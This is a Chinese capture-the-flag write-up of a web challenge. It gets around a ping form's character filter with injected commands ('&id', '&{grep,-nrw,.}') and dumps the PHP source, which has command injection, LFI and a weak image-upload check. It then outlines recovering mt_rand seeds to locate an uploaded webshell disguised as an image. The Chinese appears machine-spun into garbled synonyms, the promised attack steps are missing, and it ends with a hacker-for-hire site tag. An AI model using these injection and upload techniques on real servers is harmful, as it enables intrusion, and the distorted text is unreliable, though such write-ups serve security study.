榜首眼看这个应战,通常是过滤一些字符或许添加一些约束来阻挠指令履行,我经过输入&id到addr域,成功回来履行成果,能够确认这是一道指令履行的应战题。
下一步咱们来找出过滤和约束。经过测验,咱们发现不能够输入空格,/,而且只能输入15个字符。
运转find和set指令,咱们能够发现一些信息。
Result of the command find:
.
./index.php
./pages
./pages/ping.php
./pages/Adm1n1sTraTi0n2.php
./files
find: `./files': Permission denied
咱们看到,/pages文件夹下有一些.php文件,/files文件夹,咱们没有权限拜访,还有一个比较风趣的文件叫Adm1n1sTraTi0n2.php
翻开后是一个上传页面,上传图片后,会回来相似file image.png?www.baidusina指令回来的信息,可是咱们不知道上传后的文件保存途径,现在的思路是,只能经过前面的指令履行缝隙来读取php源码,由于过滤了空格和/,所以咱们运用grep来递归读文件,我这儿运用的是&{grep,-nrw,.}
index.php
---------
3magic
'?page=ping'>ping
if ($_SERVER['REMOTE_ADDR'] == '127.0.0.1') {
?>
'?page=Adm1n1sTraTi0n2'>admin
}
?>
if (isset($_GET['page'])) {
$p = $_GET['page'];
if (preg_match('/(://)/', $p)) {
die('attack detected');
}
include("pages/".$p.".php");
die();
}
?>
ping.php
--------
ping
"./?page=ping" method="POST">
"text" name="addr" placeholder="addr">
"submit" value="send">
"width: 300px; height: 300px" placeholder="result">
if (isset($_POST['addr'])) {
$addr = $_POST['addr'];
if (preg_match('/[`;$()| /'>"t]/', $addr)) {
die("invalid character detected");
}
if (strpos($addr, ".php") !== false){
die("invalid character detected");
}
if (strlen($addr) > 15) {
die("addr is too long");
}
@system("timeout 2 bash -c 'ping -c 1 $addr' 2>&1");
}
?>
Adm1n1sTraTi0n2.php
-------------------
image inspector
mt_srand((time() % rand(1,10000) + rand(2000,5000))%rand(1000,9000)+rand(2000,5000));
// files directory flushed every 3min
setcookie('test', mt_rand(), time(), '/');
if (isset($_POST['submit'])) {
$check = getimagesize($_FILES['file']['tmp_name']);
if($check !== false) {
echo 'File is an image - ' . $check['mime'];
$filename = '/var/www/html/3magic/files/'.mt_rand().'_'.$_FILES['file']['name']; // prevent path traversal
move_uploaded_file($_FILES['file']['tmp_name'], $filename);
echo "
n";
system('/usr/bin/file -b '.escapeshellarg($filename));
echo "
n";
} else {
echo "File is not an image";
}
}
?>
"?page=Adm1n1sTraTi0n2" method="post" enctype="multipart/form-data">
Select image to upload:
"file" name="file">
"submit" value="Upload Image" name="submit">
index.php:
经过源码能够看出这个文件的page参数有LFI缝隙,可是不能够进一步运用,由于服务器装置的PHP版别,现已修补了%00切断缝隙
图画验证仅仅经过getsizeimage()函数验证了图画巨细,上传的文件名经过文件名+随机数生成
当拜访页面的时分,会经过mt_srand()生成随机数种子,随后会用mt_rand()生成随机数在cookie里,最终结合上传后的文件名,存放到/files目录中
mt_rand()已知的是有缝隙的,咱们能从恣意mt_rand()值中康复种子,假如想了解细节,能够参阅这篇文章http://www.openwall.com/php_mt_seed/README,也能够下载运用东西http://download.openwall.net/pub/projects/php_mt_seed/php_mt_seed-3.2.tar.gz
现在进犯思路清晰了,咱们首要上传一个.php文件,其实就是在一个图片文件的结尾加上,以便绕过getsizeimage()函数。然后在cookie中test字段找到mt_rand()生成的值,运用php_mt_seed东西康复种子,最终再运用mt_rand()结合上传的文件名,拜访/files下的文件。
详细进犯流程如下:
[1] [2] 黑客接单网